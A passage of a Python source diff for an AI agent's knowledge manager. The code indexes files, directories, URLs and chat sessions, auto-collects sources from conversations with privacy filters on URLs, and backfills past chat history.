payload.get("chunks", []) + # Merge chunks back into per-document text blocks + docs: dict[str, dict[str, Any]] = {} + for chunk in chunks: + doc_path = chunk.get("document_path") or source_id + if doc_path not in docs: + docs[doc_path] = { + "path": doc_path, + "title": chunk.get("document_title") or doc_path, + "text": [], + } + docs[doc_path]["text"].append(chunk.get("text", "")) + documents = [ + { + "path": d["path"], + "title": d["title"], + "text": "\n\n".join(d["text"]), + } + for d in docs.values() + ] + return { + "indexed": True, + "indexed_at": payload.get("indexed_at"), + "document_count": payload.get("document_count", len(documents)), + "chunk_count": payload.get("chunk_count", len(chunks)), + "documents": documents, + } + + def _source_dir(self, source_id: str) -> Path: + return self.sources_dir / self._safe_name(source_id) + + def _source_index_path(self, source_id: str) -> Path: + return self._source_dir(source_id) / "index.json" + + def _source_content_md_path(self, source_id: str) -> Path: + return self._source_dir(source_id) / "content.md" + + def get_source_storage_dir(self, source_id: str) -> Path: + return self._source_dir(source_id) + + def list_sources_from_storage(self) -> list[KnowledgeSourceSpec]: + """Rebuild source specs from persisted v2 storage layout.""" + sources: list[KnowledgeSourceSpec] = [] + for index_path in sorted(self.sources_dir.glob("*/index.json")): + try: + payload = self._load_json(index_path) + source_payload = payload.get("source") + if not isinstance(source_payload, dict): + continue + source = KnowledgeSourceSpec.model_validate(source_payload) + sources.append(source) + except Exception: + logger.warning( + "Failed to read source spec from storage index: %s", + index_path, + ) + return sources + + def _load_index_payload(self, source_id: str) -> dict[str, Any] | None: + source_index_path = self._source_index_path(source_id) + if source_index_path.exists(): + return self._load_json(source_index_path) + return None + 
+ def _write_source_storage( + self, + source: KnowledgeSourceSpec, + payload: dict[str, Any], + documents: list[dict[str, str]], + ) -> None: + source_dir = self._source_dir(source.id) + source_dir.mkdir(parents=True, exist_ok=True) + (source_dir / "raw").mkdir(parents=True, exist_ok=True) + (source_dir / "media").mkdir(parents=True, exist_ok=True) + + self._source_index_path(source.id).write_text( + json.dumps(payload, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + self._source_content_md_path(source.id).write_text( + self._build_source_markdown(source, documents), + encoding="utf-8", + ) + self._sync_raw_source_assets(source) + self._update_catalog_entry(source, payload) + + def _update_catalog_entry( + self, + source: KnowledgeSourceSpec, + payload: dict[str, Any], + ) -> None: + catalog: dict[str, Any] = { + "version": 2, + "updated_at": datetime.now(UTC).isoformat(), + "sources": {}, + } + if self.catalog_path.exists(): + try: + current = self._load_json(self.catalog_path) + if isinstance(current, dict): + catalog.update(current) + if not isinstance(catalog.get("sources"), dict): + catalog["sources"] = {} + except Exception: + logger.warning("Failed to read knowledge catalog, recreating") + + catalog["updated_at"] = datetime.now(UTC).isoformat() + catalog["sources"][source.id] = { + "id": source.id, + "name": source.name, + "type": source.type, + "indexed_at": payload.get("indexed_at"), + "document_count": payload.get("document_count", 0), + "chunk_count": payload.get("chunk_count", 0), + "path": str(self._source_dir(source.id)), + } + + self.catalog_path.write_text( + json.dumps(catalog, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + + def _build_source_markdown( + self, + source: KnowledgeSourceSpec, + documents: list[dict[str, str]], + ) -> str: + lines = [ + f"# {source.name}", + "", + "## Metadata", + "", + f"- id: {source.id}", + f"- type: {source.type}", + f"- location: {source.location or '-'}", + f"- updated_at: 
{datetime.now(UTC).isoformat()}", + "", + "## Documents", + "", + ] + if not documents: + lines.append("(no documents)") + lines.append("") + return "\n".join(lines) + + for doc in documents: + title = self._truncate_title(doc.get("title", "document"), max_len=200) + path = doc.get("path", "") + text = doc.get("text", "").strip() + lines.extend( + [ + f"### {title}", + "", + f"- path: {path}", + "", + text if text else "(empty)", + "", + ], + ) + return "\n".join(lines) + + def _sync_raw_source_assets(self, source: KnowledgeSourceSpec) -> None: + raw_root = self._source_dir(source.id) / "raw" + media_root = self._source_dir(source.id) / "media" + + if source.type not in {"file", "directory"}: + return + if not source.location: + return + + source_path = Path(source.location).expanduser() + if not source_path.exists(): + return + + if source.type == "file" and source_path.is_file(): + target_file = raw_root / source_path.name + try: + shutil.copy2(source_path, target_file) + self._write_media_semantic_if_needed(target_file, media_root) + except Exception: + logger.warning("Failed to sync raw file for source %s", source.id) + return + + if source.type == "directory" and source_path.is_dir(): + target_dir = raw_root / source_path.name + if target_dir.exists(): + shutil.rmtree(target_dir, ignore_errors=True) + try: + shutil.copytree(source_path, target_dir, dirs_exist_ok=True) + for file_path in target_dir.rglob("*"): + if file_path.is_file(): + self._write_media_semantic_if_needed(file_path, media_root) + except Exception: + logger.warning("Failed to sync raw directory for source %s", source.id) + + def _write_media_semantic_if_needed(self, file_path: Path, media_root: Path) -> None: + suffix = file_path.suffix.lower() + media_kind = None + if suffix in {".png", ".jpg", ".jpeg", ".gif", ".webp", ".bmp", ".svg"}: + media_kind = "image" + elif suffix in {".mp3", ".wav", ".m4a", ".flac", ".ogg"}: + media_kind = "audio" + elif suffix in {".mp4", ".mov", ".avi", ".mkv", 
".webm"}: + media_kind = "video" + if media_kind is None: + return + + semantic_name = f"{self._safe_name(file_path.stem)}.semantic.md" + semantic_path = media_root / semantic_name + size = file_path.stat().st_size if file_path.exists() else 0 + semantic_path.write_text( + "\n".join( + [ + f"# {file_path.name}", + "", + "## Semantic Summary", + "", + "(placeholder) Semantic extraction is not generated yet.", + "", + "## Metadata", + "", + f"- kind: {media_kind}", + f"- original_file: {file_path.as_posix()}", + f"- size_bytes: {size}", + ], + ), + encoding="utf-8", + ) + + @staticmethod + def _load_json(path: Path) -> dict[str, Any]: + return json.loads(path.read_text(encoding="utf-8")) + + def _load_documents( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig, + ) -> list[dict[str, str]]: + if source.type == "file": + path = Path(source.location).expanduser().resolve() + return [self._read_file_document(path, config)] + if source.type == "directory": + return self._read_directory_documents(Path(source.location), source, config) + if source.type == "url": + if source.content and source.content.strip(): + return [ + { + "path": source.location or source.id, + "title": source.name, + "text": self._normalize_text(source.content), + } + ] + return [self._read_url_document(source.location)] + if source.type == "chat": + if source.location and source.location.strip(): + return self._read_single_chat_document(source.location.strip()) + return self._read_chat_documents() + text_content = source.content.strip() + if not text_content and source.location.strip(): + text_content = Path(source.location).expanduser().read_text( + encoding="utf-8", + ) + return [ + { + "path": source.location or source.id, + "title": source.name, + "text": self._normalize_text(text_content), + }, + ] + + def _read_directory_documents( + self, + directory: Path, + source: KnowledgeSourceSpec, + config: KnowledgeConfig, + ) -> list[dict[str, str]]: + root = 
directory.expanduser().resolve() + if not root.exists() or not root.is_dir(): + raise FileNotFoundError(f"Knowledge directory not found: {root}") + + pattern = "**/*" if source.recursive else "*" + documents: list[dict[str, str]] = [] + for path in root.glob(pattern): + if not path.is_file(): + continue + relative = path.relative_to(root).as_posix() + if not self._is_allowed_path(relative, config): + continue + documents.append(self._read_file_document(path, config)) + return documents + + def save_uploaded_file(self, source_id: str, filename: str, data: bytes) -> Path: + """Persist an uploaded file and return its saved path.""" + safe_source = self._safe_name(source_id) + safe_name = self._safe_name(Path(filename).name) + target_dir = self.uploads_dir / "files" / safe_source + if target_dir.exists(): + shutil.rmtree(target_dir, ignore_errors=True) + target_dir.mkdir(parents=True, exist_ok=True) + target_path = target_dir / safe_name + target_path.write_bytes(data) + return target_path + + def save_uploaded_directory( + self, + source_id: str, + files: list[tuple[str, bytes]], + ) -> Path: + """Persist an uploaded directory snapshot and return its root path.""" + safe_source = self._safe_name(source_id) + target_dir = self.uploads_dir / "directories" / safe_source + if target_dir.exists(): + shutil.rmtree(target_dir, ignore_errors=True) + target_dir.mkdir(parents=True, exist_ok=True) + + for relative_path, data in files: + normalized = Path(relative_path) + safe_parts = [self._safe_name(part) for part in normalized.parts if part not in {"", "."}] + if not safe_parts: + continue + file_path = target_dir.joinpath(*safe_parts) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_bytes(data) + return target_dir + + def _read_chat_documents(self) -> list[dict[str, str]]: + """Build documents from persisted chat registry and session files.""" + chats_path = self.working_dir / CHATS_FILE + if not chats_path.exists(): + return [] + payload = 
json.loads(chats_path.read_text(encoding="utf-8")) + chats = payload.get("chats", []) + documents: list[dict[str, str]] = [] + sessions_dir = self.working_dir / "sessions" + for chat in chats: + session_id = chat.get("session_id", "") + user_id = chat.get("user_id", "") + session_path = sessions_dir / self._session_filename(session_id, user_id) + collected_text = "" + if session_path.exists(): + state = json.loads(session_path.read_text(encoding="utf-8")) + collected_text = self._extract_visible_chat_text(state) + text = self._normalize_text( + "\n".join( + part + for part in [ + chat.get("name", ""), + chat.get("channel", ""), + session_id, + collected_text, + ] + if part + ), + ) + if not text: + continue + documents.append( + { + "path": str(session_path), + "title": chat.get("name") or session_id or "chat", + "text": text, + }, + ) + return documents + + def _read_single_chat_document(self, session_id: str) -> list[dict[str, str]]: + """Load a single chat session by session_id and return it as one text document.""" + chats_path = self.working_dir / CHATS_FILE + sessions_dir = self.working_dir / "sessions" + chat_meta: dict[str, Any] = {} + + # Try to find matching chat metadata from registry + if chats_path.exists(): + try: + payload = json.loads(chats_path.read_text(encoding="utf-8")) + for chat in payload.get("chats", []): + if chat.get("session_id", "") == session_id: + chat_meta = chat + break + except Exception: + logger.warning("Failed to read chat registry while resolving session %s", session_id) + + user_id = chat_meta.get("user_id", "") + chat_name = chat_meta.get("name", "") or session_id + + # Try known session filename patterns + candidates: list[Path] = [] + if user_id: + candidates.append(sessions_dir / self._session_filename(session_id, user_id)) + candidates.append(sessions_dir / self._session_filename(session_id, "")) + # Glob fallback: any file ending with the sanitized session_id + safe_sid = _sanitize_filename(session_id) + candidates.extend(sessions_dir.glob(f"*_{safe_sid}.json") if sessions_dir.exists() else []) +
candidates.extend(sessions_dir.glob(f"{safe_sid}.json") if sessions_dir.exists() else []) + + session_path: Path | None = None + for candidate in candidates: + if candidate.exists(): + session_path = candidate + break + + if session_path is None: + raise FileNotFoundError( + f"Session file not found for session_id: {session_id}" + ) + + state = json.loads(session_path.read_text(encoding="utf-8")) + collected_text = self._extract_visible_chat_text(state) + text = self._normalize_text(collected_text) + if not text: + raise ValueError(f"No visible text found in session: {session_id}") + + return [ + { + "path": str(session_path), + "title": chat_name, + "text": text, + } + ] + + def auto_collect_from_messages( + self, + config: KnowledgeConfig, + session_id: str, + user_id: str, + request_messages: list[Any] | None, + response_messages: list[Any] | None = None, + running_config: Any | None = None, + ) -> dict[str, Any]: + """Backward-compatible wrapper for turn-based auto collection.""" + user_stage = self.auto_collect_user_message_assets( + config=config, + session_id=session_id, + user_id=user_id, + request_messages=request_messages, + running_config=running_config, + ) + text_stage = self.auto_collect_turn_text_pair( + config=config, + session_id=session_id, + user_id=user_id, + request_messages=request_messages, + response_messages=response_messages, + running_config=running_config, + ) + return { + "changed": bool(user_stage.get("changed") or text_stage.get("changed")), + "file_sources": int(user_stage.get("file_sources", 0) or 0), + "url_sources": int(user_stage.get("url_sources", 0) or 0), + "text_sources": int(text_stage.get("text_sources", 0) or 0), + "failed_sources": int(user_stage.get("failed_sources", 0) or 0) + + int(text_stage.get("failed_sources", 0) or 0), + "errors": [ + *(user_stage.get("errors") or []), + *(text_stage.get("errors") or []), + ], + } + + def auto_collect_user_message_assets( + self, + config: KnowledgeConfig, + session_id: str, + 
user_id: str, + request_messages: list[Any] | None, + running_config: Any | None = None, + ) -> dict[str, Any]: + """Collect file/url knowledge immediately from user-sent content.""" + if not config.enabled or not bool( + getattr(running_config, "knowledge_enabled", True) + ): + return { + "changed": False, + "file_sources": 0, + "url_sources": 0, + "text_sources": 0, + } + + changed = False + file_sources = 0 + url_sources = 0 + errors: list[dict[str, str]] = [] + user_messages = list(request_messages or []) + + knowledge_auto_collect_chat_files = getattr(running_config, "knowledge_auto_collect_chat_files", None) + if knowledge_auto_collect_chat_files is None: + knowledge_auto_collect_chat_files = config.automation.knowledge_auto_collect_chat_files + + knowledge_auto_collect_chat_urls = getattr(running_config, "knowledge_auto_collect_chat_urls", None) + if knowledge_auto_collect_chat_urls is None: + knowledge_auto_collect_chat_urls = config.automation.knowledge_auto_collect_chat_urls + auto_collect_url_min_chars = int( + getattr( + running_config, + "auto_collect_url_min_chars", + _AUTO_COLLECT_URL_MIN_CONTENT_CHARS, + ) + or _AUTO_COLLECT_URL_MIN_CONTENT_CHARS + ) + + if knowledge_auto_collect_chat_files: + for source in self._build_file_sources_from_messages( + user_messages, + config, + session_id, + ): + if self._upsert_source(config, source): + changed = True + self._index_source_with_recovery( + source, + config, + running_config, + errors, + ) + file_sources += 1 + + if knowledge_auto_collect_chat_urls: + for source in self._build_url_sources_from_messages( + user_messages, + session_id, + user_id, + automation_config=config.automation, + min_content_chars=auto_collect_url_min_chars, + ): + if self._upsert_source(config, source): + changed = True + self._index_source_with_recovery( + source, + config, + running_config, + errors, + ) + url_sources += 1 + + result = { + "changed": changed, + "file_sources": file_sources, + "url_sources": url_sources, + 
"text_sources": 0, + } + if errors: + result["failed_sources"] = len(errors) + result["errors"] = errors + return result + + def auto_collect_turn_text_pair( + self, + config: KnowledgeConfig, + session_id: str, + user_id: str, + request_messages: list[Any] | None, + response_messages: list[Any] | None = None, + running_config: Any | None = None, + ) -> dict[str, Any]: + """Collect text knowledge after response, based on one user-assistant turn pair.""" + if not config.enabled or not bool( + getattr(running_config, "knowledge_enabled", True) + ): + return { + "changed": False, + "file_sources": 0, + "url_sources": 0, + "text_sources": 0, + } + + knowledge_auto_collect_long_text = getattr(running_config, "knowledge_auto_collect_long_text", None) + if knowledge_auto_collect_long_text is None: + knowledge_auto_collect_long_text = config.automation.knowledge_auto_collect_long_text + if not knowledge_auto_collect_long_text: + return { + "changed": False, + "file_sources": 0, + "url_sources": 0, + "text_sources": 0, + } + + knowledge_long_text_min_chars = getattr(running_config, "knowledge_long_text_min_chars", None) + if not isinstance(knowledge_long_text_min_chars, int): + knowledge_long_text_min_chars = config.automation.knowledge_long_text_min_chars + + errors: list[dict[str, str]] = [] + changed = False + text_sources = 0 + for source in self._build_text_sources_from_turn_pair( + request_messages=list(request_messages or []), + response_messages=list(response_messages or []), + session_id=session_id, + user_id=user_id, + knowledge_long_text_min_chars=knowledge_long_text_min_chars, + ): + if self._upsert_source(config, source): + changed = True + self._index_source_with_recovery( + source, + config, + running_config, + errors, + ) + text_sources += 1 + + result = { + "changed": changed, + "file_sources": 0, + "url_sources": 0, + "text_sources": text_sources, + } + if errors: + result["failed_sources"] = len(errors) + result["errors"] = errors + return result + + def 
auto_backfill_history_data( + self, + config: KnowledgeConfig, + running_config: Any | None = None, + ) -> dict[str, Any]: + """Backfill historical chat-session data into knowledge sources once.""" + if not config.enabled or not bool( + getattr(running_config, "knowledge_enabled", True) + ): + self._save_backfill_progress( + { + "running": False, + "completed": False, + "failed": False, + "reason": "knowledge_disabled", + "updated_at": datetime.now(UTC).isoformat(), + } + ) + return {"changed": False, "skipped": True, "reason": "knowledge_disabled"} + + signature = self._history_backfill_signature(running_config) + state = self._load_backfill_state() + if ( + state.get("completed") + and state.get("signature") == signature + ): + self._save_backfill_progress( + { + "running": False, + "completed": True, + "failed": False, + "reason": "already_completed", + "updated_at": datetime.now(UTC).isoformat(), + } + ) + return {"changed": False, "skipped": True, "reason": "already_completed"} + + chats_path = self.working_dir / CHATS_FILE + if chats_path.exists(): + payload = self._load_json(chats_path) + chats = payload.get("chats", []) + else: + chats = [] + + sessions_dir = self.working_dir / "sessions" + total_sessions = sum( + 1 for chat in chats if str(chat.get("session_id", "") or "").strip() + ) + changed = False + traversed_sessions = 0 + processed_sessions = 0 + file_sources = 0 + url_sources = 0 + text_sources = 0 + errors: list[dict[str, str]] = [] + + self._save_backfill_progress( + { + "running": True, + "completed": False, + "failed": False, + "total_sessions": total_sessions, + "traversed_sessions": 0, + "processed_sessions": 0, + "current_session_id": None, + "updated_at": datetime.now(UTC).isoformat(), + } + ) + + knowledge_long_text_min_chars = getattr(running_config, "knowledge_long_text_min_chars", None) + if not isinstance(knowledge_long_text_min_chars, int): + knowledge_long_text_min_chars = config.automation.knowledge_long_text_min_chars + 
knowledge_auto_collect_chat_files = getattr(running_config, "knowledge_auto_collect_chat_files", False) + knowledge_auto_collect_chat_urls = getattr(running_config, "knowledge_auto_collect_chat_urls", True) + knowledge_auto_collect_long_text = getattr(running_config, "knowledge_auto_collect_long_text", False) + auto_collect_url_min_chars = int( + getattr( + running_config, + "auto_collect_url_min_chars", + _AUTO_COLLECT_URL_MIN_CONTENT_CHARS, + ) + or _AUTO_COLLECT_URL_MIN_CONTENT_CHARS + ) + + try: + for chat in chats: + session_id = str(chat.get("session_id", "") or "") + user_id = str(chat.get("user_id", "") or "") + if not session_id: + continue + + traversed_sessions += 1 + self._save_backfill_progress( + { + "running": True, + "completed": False, + "failed": False, + "total_sessions": total_sessions, + "traversed_sessions": traversed_sessions, + "processed_sessions": processed_sessions, + "current_session_id": session_id, + "updated_at": datetime.now(UTC).isoformat(), + } + ) + + session_path = sessions_dir / self._session_filename(session_id, user_id) + if not session_path.exists(): + continue + state_payload = self._load_json(session_path) + messages = self._messages_from_session_state(state_payload) + if not messages: + continue + processed_sessions += 1 + + if knowledge_auto_collect_chat_files: + for source in self._build_file_sources_from_messages( + messages, + config, + session_id, + ): + upserted = self._upsert_source(config, source) + if upserted: + changed = True + self._index_source_with_recovery( + source, + config, + running_config, + errors, + ) + file_sources += 1 + + if knowledge_auto_collect_long_text: + for source in self._build_text_sources_from_messages( + messages, + config, + session_id, + user_id, + knowledge_long_text_min_chars, + ): + upserted = self._upsert_source(config, source) + if upserted: + changed = True + self._index_source_with_recovery( + source, + config, + running_config, + errors, + ) + text_sources += 1 + + if 
knowledge_auto_collect_chat_urls: + for source in self._build_url_sources_from_messages( + messages, + session_id, + user_id, + automation_config=config.automation, + min_content_chars=auto_collect_url_min_chars, + ): + upserted = self._upsert_source(config, source) + if upserted: + changed = True + self._index_source_with_recovery( + source, + config, + running_config, + errors, + ) + url_sources += 1 + except Exception as exc: + self._save_backfill_progress( + { + "running": False, + "completed": False, + "failed": True, + "error": str(exc), + "total_sessions": total_sessions, + "traversed_sessions": traversed_sessions, + "processed_sessions": processed_sessions, + "updated_at": datetime.now(UTC).isoformat(), + } + ) + raise + + self._save_backfill_state( + { + "completed": True, + "signature": signature, + "processed_sessions": processed_sessions, + "file_sources": file_sources, + "url_sources": url_sources, + "text_sources": text_sources, + "updated_at": datetime.now(UTC).isoformat(), + }, + ) + self._save_backfill_progress( + { + "running": False, + "completed": True, + "failed": False, + "total_sessions": total_sessions, + "traversed_sessions": traversed_sessions, + "processed_sessions": processed_sessions, + "updated_at": datetime.now(UTC).isoformat(), + } + ) + result = { + "changed": changed, + "skipped": False, + "processed_sessions": processed_sessions, + "file_sources": file_sources, + "url_sources": url_sources, + "text_sources": text_sources, + } + if errors: + result["failed_sources"] = len(errors) + result["errors"] = errors + return result + + def _index_source_with_recovery( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig, + running_config: Any | None, + errors: list[dict[str, str]], + ) -> None: + try: + self.index_source(source, config, running_config) + except Exception as exc: + errors.append( + { + "source_id": source.id, + "source_type": source.type, + "location": source.location, + "error": str(exc), + }, + ) + + def 
_read_file_document( + self, + path: Path, + config: KnowledgeConfig, + ) -> dict[str, str]: + file_path = path.expanduser().resolve() + if not file_path.exists() or not file_path.is_file(): + raise FileNotFoundError(f"Knowledge file not found: {file_path}") + if file_path.stat().st_size > config.index.max_file_size: + raise ValueError(f"Knowledge file exceeds max size: {file_path}") + return { + "path": str(file_path), + "title": file_path.name, + "text": self._normalize_text( + file_path.read_text(encoding="utf-8", errors="ignore"), + ), + } + + @staticmethod + def _read_url_document(url: str) -> dict[str, str]: + response = httpx.get(url, timeout=10.0, follow_redirects=True) + response.raise_for_status() + content_type = str(response.headers.get("content-type", "") or "").lower() + if content_type and not any( + marker in content_type for marker in _TEXTUAL_CONTENT_TYPE_MARKERS + ): + # Skip binary payloads (image/audio/video/pdf/zip, etc.) to avoid + # turning bytes into garbled text in knowledge sources. 
+ return { + "path": url, + "title": url, + "text": "", + } + content = response.text + title = url + if "text/html" in content_type: + title_match = re.search( + r"<title[^>]*>(.*?)</title>", + content, + flags=re.S | re.I, + ) + if title_match: + extracted = KnowledgeManager._normalize_text( + unescape(title_match.group(1)), + ) + if extracted: + title = extracted + content = re.sub(r"<script\b[^>]*>.*?</script>", " ", content, flags=re.S | re.I) + content = re.sub(r"<style\b[^>]*>.*?</style>", " ", content, flags=re.S | re.I) + content = re.sub(r"<[^>]+>", " ", content) + return { + "path": url, + "title": title, + "text": KnowledgeManager._normalize_text(unescape(content)), + } + + @staticmethod + def _normalize_text(text: str) -> str: + compact = text.replace("\r", "\n") + # Remove all blank lines (lines containing only whitespace) + compact = re.sub(r"\n[ \t]*\n+", "\n", compact) + compact = re.sub(r"[ \t]+", " ", compact) + return compact.strip() + + def _extract_visible_chat_text(self, state: dict[str, Any]) -> str: + messages = self._messages_from_session_state(state) + snippets = [ + self._extract_text_from_runtime_message(message) + for message in messages + ] + return self._normalize_text("\n\n".join(item for item in snippets if item)) + + @staticmethod + def _messages_from_session_state(state: dict[str, Any]) -> list[dict[str, Any]]: + memory_state = state.get("agent", {}).get("memory", {}) + if isinstance(memory_state, dict): + raw_entries = memory_state.get("content", []) + elif isinstance(memory_state, list): + raw_entries = memory_state + else: + raw_entries = [] + + messages: list[dict[str, Any]] = [] + for entry in raw_entries: + raw_message = None + if isinstance(entry, list) and entry: + raw_message = entry[0] + elif isinstance(entry, dict): + raw_message = entry + if not isinstance(raw_message, dict): + continue + if raw_message.get("type") in {"plugin_call", "plugin_call_output"}: + continue + messages.append(raw_message) + return messages + + @staticmethod + def 
_extract_text_from_state(value: Any) -> str: + snippets: list[str] = [] + + def walk(node: Any) -> None: + if isinstance(node, str): + cleaned = node.strip() + if cleaned: + snippets.append(cleaned) + return + if isinstance(node, list): + for item in node: + walk(item) + return + if isinstance(node, dict): + for key in ("text", "thinking", "output", "name", "role"): + if key in node and isinstance(node[key], str): + walk(node[key]) + content = node.get("content") + if content is not None: + walk(content) + data = node.get("data") + if data is not None: + walk(data) + for nested_key, nested_value in node.items(): + if nested_key in {"text", "thinking", "output", "name", "role", "content", "data"}: + continue + if isinstance(nested_value, (dict, list)): + walk(nested_value) + + walk(value) + return "\n".join(snippets) + + def _build_file_sources_from_messages( + self, + messages: list[Any], + config: KnowledgeConfig, + session_id: str, + ) -> list[KnowledgeSourceSpec]: + sources: list[KnowledgeSourceSpec] = [] + seen_ids: set[str] = set() + for block in self._iter_message_blocks(messages): + if block.get("type") != "file": + continue + file_ref = self._file_reference_from_block(block) + if not file_ref: + continue + parsed_ref = urlparse(file_ref) + remote_hash = None + if parsed_ref.scheme in {"http", "https"}: + remote_hash = hashlib.sha1(file_ref.encode("utf-8")).hexdigest() + stored_path = self._materialize_file_reference( + file_ref, + block.get("name") or Path(file_ref).name or "chat-file", + config, + ) + if stored_path is None: + continue + digest = hashlib.sha1(str(stored_path).encode("utf-8")).hexdigest()[:12] + source_id = f"auto-file-{digest}" + if source_id in seen_ids: + continue + seen_ids.add(source_id) + tags = ["auto", "origin:auto", "source:chat", "auto:file"] + if remote_hash: + tags.extend(["remote:http", f"remote:url_hash:{remote_hash}"]) + sources.append( + KnowledgeSourceSpec( + id=source_id, + name=f"Auto File: {stored_path.name}", + 
type="file", + location=str(stored_path), + enabled=True, + recursive=False, + tags=tags, + summary=f"Auto-collected from chat session {session_id}", + ), + ) + return sources + + def _build_text_sources_from_messages( + self, + messages: list[Any], + config: KnowledgeConfig, + session_id: str, + user_id: str, + knowledge_long_text_min_chars: int, + ) -> list[KnowledgeSourceSpec]: + sources: list[KnowledgeSourceSpec] = [] + seen_ids: set[str] = set() + for role, text in self._iter_message_texts(messages): + normalized = self._normalize_text(text) + if len(normalized) < knowledge_long_text_min_chars: + continue + digest = hashlib.sha1(normalized.encode("utf-8")).hexdigest()[:12] + source_id = f"auto-text-{digest}" + if source_id in seen_ids: + continue + seen_ids.add(source_id) + title = normalized.splitlines()[0][:48] or "Long chat text" + sources.append( + KnowledgeSourceSpec( + id=source_id, + name=f"Auto Text: {title}", + type="text", + content=normalized, + enabled=True, + recursive=False, + tags=[ + "auto", + "origin:auto", + "source:chat", + "auto:text", + f"role:{role}", + ], + summary=( + f"Auto-saved from {role} message in {session_id}" + + (f" for {user_id}" if user_id else "") + ), + ), + ) + return sources + + def _build_text_sources_from_turn_pair( + self, + request_messages: list[Any], + response_messages: list[Any], + session_id: str, + user_id: str, + knowledge_long_text_min_chars: int, + ) -> list[KnowledgeSourceSpec]: + user_text = self._normalize_text( + "\n".join( + text + for role, text in self._iter_message_texts(request_messages) + if str(role).lower() == "user" + ) + ) + assistant_text = self._normalize_text( + "\n".join( + text + for role, text in self._iter_message_texts(response_messages) + if str(role).lower() == "assistant" + ) + ) + if not user_text or not assistant_text: + return [] + + merged = self._normalize_text(f"用户: {user_text}\n\n智能体: {assistant_text}") + if len(merged) < knowledge_long_text_min_chars: + return [] + + digest = 
hashlib.sha1(merged.encode("utf-8")).hexdigest()[:12] + source_id = f"auto-text-{digest}" + title = merged.splitlines()[0][:48] or "Long chat text" + return [ + KnowledgeSourceSpec( + id=source_id, + name=f"Auto Text: {title}", + type="text", + content=merged, + enabled=True, + recursive=False, + tags=[ + "auto", + "origin:auto", + "source:chat", + "auto:text", + "role:turn_pair", + ], + summary=( + f"Auto-saved from user-assistant turn in {session_id}" + + (f" for {user_id}" if user_id else "") + ), + ) + ] + + def _build_url_sources_from_messages( + self, + messages: list[Any], + session_id: str, + user_id: str, + automation_config: Any | None = None, + min_content_chars: int | None = None, + ) -> list[KnowledgeSourceSpec]: + sources: list[KnowledgeSourceSpec] = [] + seen_ids: set[str] = set() + for role, text in self._iter_message_texts(messages): + for url in self._extract_urls_from_text(text): + if self._should_exclude_url(url, automation_config): + logger.debug("Skipping excluded URL: %s", url) + continue + digest = hashlib.sha1(url.encode("utf-8")).hexdigest()[:12] + source_id = f"auto-url-{digest}" + if source_id in seen_ids: + continue + seen_ids.add(source_id) + label = url if len(url) <= 80 else f"{url[:77]}..." + fetched_text = "" + if min_content_chars is not None: + try: + doc = self._read_url_document(url) + except Exception: + continue + fetched_text = self._normalize_text(doc.get("text", "")) + if len(fetched_text) < max(0, min_content_chars): + continue + # Capture surrounding text context from the conversation message + # so title generation can use it without fetching the URL. 
+ context_snippet = self._extract_url_context(text, url, max_chars=400) + summary = ( + f"Auto-collected URL from {role} message in {session_id}" + + (f" for {user_id}" if user_id else "") + ) + if context_snippet: + summary = f"{summary}\n来源上下文: {context_snippet}" + sources.append( + KnowledgeSourceSpec( + id=source_id, + name=f"Auto URL: {label}", + type="url", + location=url, + content=fetched_text, + enabled=True, + recursive=False, + tags=[ + "auto", + "origin:auto", + "source:chat", + "auto:url", + f"role:{role}", + ], + summary=summary, + ), + ) + return sources + + @staticmethod + def _extract_urls_from_text(text: str) -> list[str]: + found: list[str] = [] + seen: set[str] = set() + for match in _CHAT_URL_RE.findall(text or ""): + cleaned = match.rstrip(_URL_TRAILING_STRIP_CHARS) + if not cleaned: + continue + + # Defensive normalization: a previously merged token may contain + # additional URLs separated by CJK words or punctuation. + normalized_urls: list[str] = [] + cjk_chunks = re.split(r"[\u4e00-\u9fff]+", cleaned) + for chunk in cjk_chunks: + chunk = chunk.strip() + if not chunk: + continue + nested = _CHAT_URL_RE.findall(chunk) + if nested: + normalized_urls.extend(nested) + else: + normalized_urls.append(chunk) + + for candidate in normalized_urls: + candidate = candidate.rstrip(_URL_TRAILING_STRIP_CHARS) + if not candidate or candidate in seen: + continue + seen.add(candidate) + found.append(candidate) + return found + + @staticmethod + def _should_exclude_url(url: str, automation_config: Any | None = None) -> bool: + """Return True if the URL should be excluded from auto-collection. + + Exclusion criteria (all can be toggled via automation_config): + - Private/intranet addresses (localhost, 127.x, 192.168.x, etc.) 
+ - URLs containing credential/token query parameters + - User-defined exclusion prefix patterns + """ + try: + parsed = urlparse(url) + except Exception: + return False + + # Private-address exclusion + exclude_private = True + if automation_config is not None: + exclude_private = bool( + getattr(automation_config, "url_exclude_private_addresses", True) + ) + if exclude_private: + host = parsed.hostname or "" + if _PRIVATE_HOST_RE.match(host): + return True + + # Token/credential query-param exclusion + exclude_tokens = True + if automation_config is not None: + exclude_tokens = bool( + getattr(automation_config, "url_exclude_token_params", True) + ) + if exclude_tokens and parsed.query: + try: + params = parse_qs(parsed.query, keep_blank_values=True) + if any(k.lower() in _URL_SENSITIVE_PARAMS for k in params): + return True + except Exception: + pass + + # User-defined pattern exclusion (prefix match) + exclude_patterns: list[str] = [] + if automation_config is not None: + raw = getattr(automation_config, "url_exclude_patterns", None) + if isinstance(raw, list): + exclude_patterns = raw + for pattern in exclude_patterns: + if isinstance(pattern, str) and url.startswith(pattern): + return True + + return False + + @staticmethod + def _extract_url_context(text: str, url: str, max_chars: int = 400) -> str: + """Extract a snippet of surrounding text around the given URL. + + Returns up to max_chars/2 chars before and max_chars/2 after + the URL occurrence, stripped and compacted. + """ + idx = text.find(url) + if idx == -1: + return "" + half = max_chars // 2 + before = text[max(0, idx - half): idx].strip() + after = text[idx + len(url): idx + len(url) + half].strip() + parts = [p for p in (before, after) if p] + snippet = " ... 
